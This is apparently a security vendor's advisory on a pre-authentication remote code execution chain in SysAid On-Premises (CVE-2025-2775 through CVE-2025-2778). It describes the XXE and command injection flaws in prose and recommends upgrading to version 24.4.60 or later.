CVE-2025-2775: PoC Released for SysAid On-Premises Pre-Auth RCE Vulnerability

watchTowr publicly disclosed technical details and a proof-of-concept exploit for a pre-authenticated Remote Code Execution (chain affecting SysAid On-Premises, a self-hosted IT service management platform used by organizations to manage IT support tasks.
6 min read

On May 7, 2025, watchTowr publicly disclosed technical details and a proof-of-concept (PoC) exploit for a pre-authenticated Remote Code Execution (RCE) chain affecting SysAid On-Premises, a self-hosted IT service management (ITSM) platform used by organizations to manage IT support tasks. 

Although the vulnerabilities were patched in March 2025, they had not been assigned Common Vulnerabilities and Exposures (CVE) identifiers and were disclosed for the first time with watchTowr’s publication. Common Vulnerability Scoring System (CVSS) scores have not been assigned. 

Given the low barrier to exploitation and the public availability of a PoC exploit, this vulnerability presents an attractive target for threat actors. In 2023, threat actors exploited a zero-day vulnerability in SysAid On-Premises to deploy Cl0p ransomware. 

Vulnerabilities

Three of the vulnerabilities—CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777—are pre-authenticated XML External Entity (XXE) injection issues discovered by watchTowr. While they stem from the same underlying flaw in the application’s XML parsing logic, they are tracked separately. A remote, unauthenticated threat actor can exploit these vulnerabilities by sending specially crafted HTTP POST requests that cause the application to fetch and process external data from threat actor-controlled servers. The vulnerabilities can also be leveraged to extract a file created during installation that contains the main administrator’s clear-text password. 

The fourth vulnerability, CVE-2025-2778, is a post-authentication command injection flaw discovered by an unknown party. It can be chained with the XXE vulnerabilities to achieve full remote code execution. 

Recommendations for CVE-2025-2775

Upgrade to Latest Fixed Version

Arctic Wolf strongly recommends that customers upgrade to the latest fixed version. 

Product  Affected Version  Fixed Version 
SysAid On-Premise  23.3.40 and prior  24.4.60 and later 

 

Please follow your organization’s patching and testing guidelines to minimize potential operational impact. 

References

 

Share this post: